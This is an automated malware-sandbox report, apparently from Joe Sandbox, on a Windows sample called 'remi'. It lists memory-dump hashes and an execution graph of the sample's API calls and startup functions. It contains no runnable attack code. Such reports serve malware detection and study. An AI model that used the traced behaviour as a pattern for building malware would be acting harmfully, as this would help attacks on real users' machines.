                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0161AFDE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2134282321.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1610000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 29ac670abc695661431ebf9598be46ed60abdd8fc5b43c3fb44e8b8afbc8b770
                                                                                                                                                                                                                                                                                                • Instruction ID: 5e7cf24068169fc362e1f6309f4dcacbe5e73f95c917ad1123d89eea7225edd6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29ac670abc695661431ebf9598be46ed60abdd8fc5b43c3fb44e8b8afbc8b770
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 121110B6C007498FDB10CF9AC844BDEFBF4AF88224F14841AD529A7254C379A545CFA1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0743E63D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 06d01a976dad81224bde2bb3c55ff607573e8fdb41299b94f9d024fe42a357c1
                                                                                                                                                                                                                                                                                                • Instruction ID: f9b602f2577d1898ef87c90953c0adf9972fbfe164a43da690b4d2a388a64c28
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06d01a976dad81224bde2bb3c55ff607573e8fdb41299b94f9d024fe42a357c1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 041133B5800309DFDB10CF8AC545BDEBBF8EB88320F10841AE518B3200D3B5A940CFA4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2124646862.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_15bd000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6d5fd6a0328c897fec8d888d553054507af91fd223bb328e7b857dcf022e1785
                                                                                                                                                                                                                                                                                                • Instruction ID: 2b5abe5f5412ab85a2567c3e01ca5eea9978f52375f99bca0340f049b42b882f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d5fd6a0328c897fec8d888d553054507af91fd223bb328e7b857dcf022e1785
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD212876504204DFDB05DF54D9C0BAABFB5FB84328F20C56DD9090F256C3BAE456CAA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2124728594.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_15cd000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e7293cecccccffcd9ee677d3c06e434a57aade4f17a150efdf86acbdc856b2f2
                                                                                                                                                                                                                                                                                                • Instruction ID: 70e15fbbeebe11f871fbb2eb51ff6976a9a24c79ebbc6455ef338d5bba2a08c5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7293cecccccffcd9ee677d3c06e434a57aade4f17a150efdf86acbdc856b2f2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21FF75604204EFDB15DF98D980B2ABBA1FB84B14F20C96DD90A9F252D37AD406CAA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2124728594.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_15cd000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 826622ec83f692b3254c0aafc054f0264c972e2e052b273620df21b8958fa384
                                                                                                                                                                                                                                                                                                • Instruction ID: 5b0778781636e4663141b7955809cc30f8959f582c0f0475fa8e3362dbb79adf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 826622ec83f692b3254c0aafc054f0264c972e2e052b273620df21b8958fa384
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B21F575504204EFDB05DF94D9C0B2ABBB6FB84B24F20C97DD9098F252C77AD446CAA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2124728594.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_15cd000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0bf75f4330716931eba23ee969f533e8ec88c1bbd60ad98048bb8bc0bd5ef5f9
                                                                                                                                                                                                                                                                                                • Instruction ID: 193f1f37df2c7a077e344aca53f83261bcedf15c462cac709915a2b4b2a79902
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bf75f4330716931eba23ee969f533e8ec88c1bbd60ad98048bb8bc0bd5ef5f9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE2180755093808FCB12CF68D594715BF71FB46614F28C5EED8498F6A7C33A980ACBA2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2124646862.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_15bd000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                                                                                                                                                                • Instruction ID: 82e009e1da627a2df5bcd31837a47bce160e79da942f1444447618961fcf3baa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C11C076404240CFCB02CF44D5C0B9ABF71FB84314F2486A9D8090A256C37AD456CB91
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2124728594.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_15cd000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                                                                                                • Instruction ID: 39ad2014479f46bdbe92d75ad6afa5d8e18ed3863024a579f8f171975cf6254f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5211BE76504280DFCB02CF94C5C0B19BB72FB84624F24C6ADD8498F256C33AD40ACB91
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2124646862.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_15bd000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 61b3f8d0eca360bd7d385893ae1041178c6785aa77d5d31ea14372dbb0dd3428
                                                                                                                                                                                                                                                                                                • Instruction ID: 3ed9a5c0c9cf01f17b9350a474cbe75382dd56c3826c8fe37daa99aaa97bc2bd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61b3f8d0eca360bd7d385893ae1041178c6785aa77d5d31ea14372dbb0dd3428
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4201A7724053849AE7144BA9DDC4BE6BFE8FF41628F18C85AEE094E297C7799440C6B1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2124646862.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_15bd000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1862fbf0d961af17d187cad443744ee2c7e0ba0d984b31dab354c85b281ab0c1
                                                                                                                                                                                                                                                                                                • Instruction ID: d8a38c49dc884baeb910b71b7bcc466d70bb5f48dc28190597127aff2c85d12a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1862fbf0d961af17d187cad443744ee2c7e0ba0d984b31dab354c85b281ab0c1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F068724053449EE7118B59DDC47A6FFA8EF41624F18C45AED084E287C3796844CBB1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f4946082291377faa26e221bb35f8f6b53c78074570921898c9d510edd2ca8f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 14576804854edda1cb1e37c8cfdf8b20c6d51bf009ebd03cb1511babca94c478
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4946082291377faa26e221bb35f8f6b53c78074570921898c9d510edd2ca8f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2E1F9B4E00259CFDB14CF99D580AAEBBB2FF89304F24826AD419A7355D770AD42CF60
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: cf2909d83d406fe3e780f064031ef1526875d5bf5b1c93c5847b9a5e3cccd802
                                                                                                                                                                                                                                                                                                • Instruction ID: 6b69a0fbeb2218a28beed1b3fee2e990698c46c53813142b6a4310f912106dac
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf2909d83d406fe3e780f064031ef1526875d5bf5b1c93c5847b9a5e3cccd802
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3E1E9B4E00259CFDB14CFA9D580AAEBBB2FF89304F24825AD418A7355D774AD42CF60
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8a207e2d6db084510b06966fe63deb0a0ff20446f9c5e731fba90f14626fb75b
                                                                                                                                                                                                                                                                                                • Instruction ID: ac0d206c101b143e75985094bc1c295e549d991da6fe0649aaca409406cfad2b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a207e2d6db084510b06966fe63deb0a0ff20446f9c5e731fba90f14626fb75b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15E1E9B4E00259CFDB14CF99D584AAEBBB2FF89304F24866AD418A7355D734AD42CF60
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 88fa7bd15694f600a77f83937d457dd7837a1b1542649985e0f07c51ec869dd6
                                                                                                                                                                                                                                                                                                • Instruction ID: 98cf38f5ff72b197caa6c224535b91fdec3fd2d144a844e97a76dc7262de8c0d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88fa7bd15694f600a77f83937d457dd7837a1b1542649985e0f07c51ec869dd6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE1E9B4E00159CFDB14CFA9D590AAEBBB2FF89304F24C25AD458AB355D7319942CF60
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: be30666ab71a85c8b925cc68f96926b26487c1b4dd6ccecdae3c14dbc162cb19
                                                                                                                                                                                                                                                                                                • Instruction ID: a93209f63a34629f76a84054c04ac609e1c0dcd22a7e671306638a67415f4d38
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be30666ab71a85c8b925cc68f96926b26487c1b4dd6ccecdae3c14dbc162cb19
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05E1FAB4E00159CFDB14CFA9D580AAEBBB2FF89304F24826AD458A7355D771AD42CF60
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 829dbb77bffdd19e9ed7121393c0de383b7dff1828444d59777d5d66c3c2e586
                                                                                                                                                                                                                                                                                                • Instruction ID: 9d33a7ee77a250a732dc49cc849ed63501a673c3e2cfbfd9b0dc93abd02c0228
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 829dbb77bffdd19e9ed7121393c0de383b7dff1828444d59777d5d66c3c2e586
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73D1E43192065ADACB11EBA4D89469DF7B1FF95300F20D79AD5093B220EF706ED8CB91
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2134282321.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1610000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ee3167077575b74a2b35a66d8395d76eafdfaedc968fc19d514ce664bdcab9ab
                                                                                                                                                                                                                                                                                                • Instruction ID: 7eed80db7c14df50288bf45eaa9e0388915a2b2db968df42c71b1c7a7e3a8380
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee3167077575b74a2b35a66d8395d76eafdfaedc968fc19d514ce664bdcab9ab
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57A18032E00219CFCF05DFB5C85059EBBB2FF85301B1985AEE905AB269DB75D94ACB40
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 379e4bfdb594837f1bfb474181775b1683384bdfc1570a6cac19a3a0f1957ab8
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a99e53ef7778b834835a5029b30c005dff87ec6850a586cc116d21ff5aa48c9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 379e4bfdb594837f1bfb474181775b1683384bdfc1570a6cac19a3a0f1957ab8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14D1E43192065ADACB11EBA4D89469DF7B1FF95300F20D79AD5093B220EF706ED8CB91
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: df9e47dd6cb423f7b2bdf66e921f3184fa83dc7cf15e20981c295c0c75a380da
                                                                                                                                                                                                                                                                                                • Instruction ID: a88100a04fa60f2296088e9965eaf4e3e3f9e4beafa4153c131df92e4e37b70a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df9e47dd6cb423f7b2bdf66e921f3184fa83dc7cf15e20981c295c0c75a380da
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35510BB4E102198BDB14CFA9D5405AEFBF2FF89304F24C26AD418A7355D771A942CF61
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2147884221.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7430000_remi.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 70578a5be6c08f4e33064c97fff734460b632d6058023f1f9f268eadfc2a3857
                                                                                                                                                                                                                                                                                                • Instruction ID: 62c123ad19de8ab002528f3e39f17f6a50c3d8351e187c11ffc4822d9402fb8e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70578a5be6c08f4e33064c97fff734460b632d6058023f1f9f268eadfc2a3857
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83511AB4E002598FDB14CFA9D5406AEFBB2FF89304F24C2AAD458AB355D7319942CF61

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:1.9%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                Signature Coverage:2%
                                                                                                                                                                                                                                                                                                Total number of Nodes:697
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                                                execution_graph 46806 4429fc 46807 442a05 46806->46807 46812 442a1e 46806->46812 46808 442a0d 46807->46808 46813 442a84 46807->46813 46810 442a15 46810->46808 46824 442d51 22 API calls 2 library calls 46810->46824 46814 442a90 46813->46814 46815 442a8d 46813->46815 46825 44e1be GetEnvironmentStringsW 46814->46825 46815->46810 46818 442a9d 46834 446ac5 20 API calls __dosmaperr 46818->46834 46821 442ad2 46821->46810 46822 442aa8 46833 446ac5 20 API calls __dosmaperr 46822->46833 46824->46812 46826 44e1d2 46825->46826 46827 442a97 46825->46827 46835 446aff 46826->46835 46827->46818 46832 442ba9 26 API calls 4 library calls 46827->46832 46829 44e1e6 ctype 46842 446ac5 20 API calls __dosmaperr 46829->46842 46831 44e200 FreeEnvironmentStringsW 46831->46827 46832->46822 46833->46818 46834->46821 46836 446b3d 46835->46836 46841 446b0d _strftime 46835->46841 46844 445354 20 API calls _Atexit 46836->46844 46838 446b28 RtlAllocateHeap 46839 446b3b 46838->46839 46838->46841 46839->46829 46841->46836 46841->46838 46843 442200 7 API calls 2 library calls 46841->46843 46842->46831 46843->46841 46844->46839 46845 43a998 46847 43a9a4 _swprintf ___BuildCatchObject 46845->46847 46846 43a9b2 46861 445354 20 API calls _Atexit 46846->46861 46847->46846 46849 43a9dc 46847->46849 46856 444acc EnterCriticalSection 46849->46856 46851 43a9b7 pre_c_initialization std::_Locinfo::_Locinfo_ctor 46852 43a9e7 46857 43aa88 46852->46857 46856->46852 46858 43aa96 46857->46858 46860 43a9f2 46858->46860 46863 448416 36 API calls 2 library calls 46858->46863 46862 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46860->46862 46861->46851 46862->46851 46863->46858 46864 402bcc 46865 402bd7 46864->46865 46866 402bdf 46864->46866 46882 403315 28 API calls _Deallocate 46865->46882 46868 402beb 46866->46868 46872 4015d3 46866->46872 46869 402bdd 46876 43360d 46872->46876 46874 402be9 46876->46874 46878 43362e std::_Facet_Register 46876->46878 46883 43a88c 46876->46883 46890 442200 7 API calls 2 library calls 46876->46890 46877 433dec std::_Facet_Register 46892 437bd7 RaiseException 46877->46892 46878->46877 46891 437bd7 RaiseException 46878->46891 46880 433e09 46882->46869 46885 446aff _strftime 46883->46885 46884 446b3d 46894 445354 20 API calls _Atexit 46884->46894 46885->46884 46887 446b28 RtlAllocateHeap 46885->46887 46893 442200 7 API calls 2 library calls 46885->46893 46887->46885 46888 446b3b 46887->46888 46888->46876 46890->46876 46891->46877 46892->46880 46893->46885 46894->46888 46895 4339be 46896 4339ca ___BuildCatchObject 46895->46896 46927 4336b3 46896->46927 46898 4339d1 46899 433b24 46898->46899 46902 4339fb 46898->46902 47218 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46899->47218 46901 433b2b 47219 4426be 28 API calls _Atexit 46901->47219 46913 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46902->46913 47212 4434d1 5 API calls CatchGuardHandler 46902->47212 46904 433b31 47220 442670 28 API calls _Atexit 46904->47220 46907 433a14 46909 433a1a 46907->46909 47213 443475 5 API calls CatchGuardHandler 46907->47213 46908 433b39 46911 433a9b 46938 433c5e 46911->46938 46913->46911 47214 43edf4 35 API calls 3 library calls 46913->47214 46921 433abd 46921->46901 46922 433ac1 46921->46922 46923 433aca 46922->46923 47216 442661 28 API calls _Atexit 46922->47216 47217 433842 13 API calls 2 library calls 46923->47217 46926 433ad2 46926->46909 46928 4336bc 46927->46928 47221 433e0a IsProcessorFeaturePresent 46928->47221 46930 4336c8 47222 4379ee 10 API calls 3 library calls 46930->47222 46932 4336cd 46933 4336d1 46932->46933 47223 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46932->47223 46933->46898 46935 4336da 46936 4336e8 46935->46936 47224 437a17 8 API calls 3 library calls 46935->47224 46936->46898 47225 436050 46938->47225 46940 433c71 GetStartupInfoW 46941 433aa1 46940->46941 46942 443422 46941->46942 47226 44ddc9 46942->47226 46944 433aaa 46947 40d767 46944->46947 46945 44342b 46945->46944 47230 44e0d3 35 API calls 46945->47230 47232 41bce3 LoadLibraryA GetProcAddress 46947->47232 46949 40d783 GetModuleFileNameW 47237 40e168 46949->47237 46951 40d79f 47252 401fbd 46951->47252 46954 401fbd 28 API calls 46955 40d7bd 46954->46955 47256 41afc3 46955->47256 46959 40d7cf 47281 401d8c 46959->47281 46961 40d7d8 46962 40d835 46961->46962 46963 40d7eb 46961->46963 47287 401d64 46962->47287 47474 40e986 111 API calls 46963->47474 46966 40d845 46969 401d64 22 API calls 46966->46969 46967 40d7fd 46968 401d64 22 API calls 46967->46968 46971 40d809 46968->46971 46970 40d864 46969->46970 47292 404cbf 46970->47292 47475 40e937 65 API calls 46971->47475 46973 40d873 47296 405ce6 46973->47296 46976 40d87f 47299 401eef 46976->47299 46977 40d824 47476 40e155 65 API calls 46977->47476 46980 40d88b 47303 401eea 46980->47303 46982 40d894 46984 401eea 11 API calls 46982->46984 46983 401eea 11 API calls 46985 40dc9f 46983->46985 46986 40d89d 46984->46986 47215 433c94 GetModuleHandleW 46985->47215 46987 401d64 22 API calls 46986->46987 46988 40d8a6 46987->46988 47307 401ebd 46988->47307 46990 40d8b1 46991 401d64 22 API calls 46990->46991 46992 40d8ca 46991->46992 46993 401d64 22 API calls 46992->46993 46995 40d8e5 46993->46995 46994 40d946 46996 401d64 22 API calls 46994->46996 47011 40e134 46994->47011 46995->46994 47477 4085b4 28 API calls 46995->47477 47002 40d95d 46996->47002 46998 40d912 46999 401eef 11 API calls 46998->46999 47000 40d91e 46999->47000 47003 401eea 11 API calls 47000->47003 47001 40d9a4 47311 40bed7 47001->47311 47002->47001 47008 4124b7 3 API calls 47002->47008 47005 40d927 47003->47005 47478 4124b7 